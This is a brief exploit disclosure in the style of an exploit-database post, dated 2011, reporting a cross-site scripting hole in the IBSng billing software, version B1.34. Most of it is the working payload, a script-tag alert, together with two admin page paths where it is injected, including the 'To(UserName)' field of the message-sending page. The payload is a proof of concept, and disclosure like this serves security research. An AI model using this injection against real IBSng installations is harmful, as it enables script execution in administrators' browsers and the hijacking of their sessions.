# Exploit Title: [XSS vulnerabilitiy in IBSng]
# Date: [12-07-2011]
# Author: [nImaarek]
# Software Link: [http://sourceforge.net/projects/ibs/]
# Version: [B1.34(T96)]
# Tested on: [CentsOs 5.5]
# Home : Pentesters.ir | sepehr-team.org

~ (Exploit) ~

~ ("><script>alert('xss')</script>) ~

1 . http://<=- Domain -=>/IBSng/admin/user/search_user.php

2 . http://<=- Domain -=>/IBSng/admin/mc/send_new_message.php
    Please put the xss code in the To(UserName)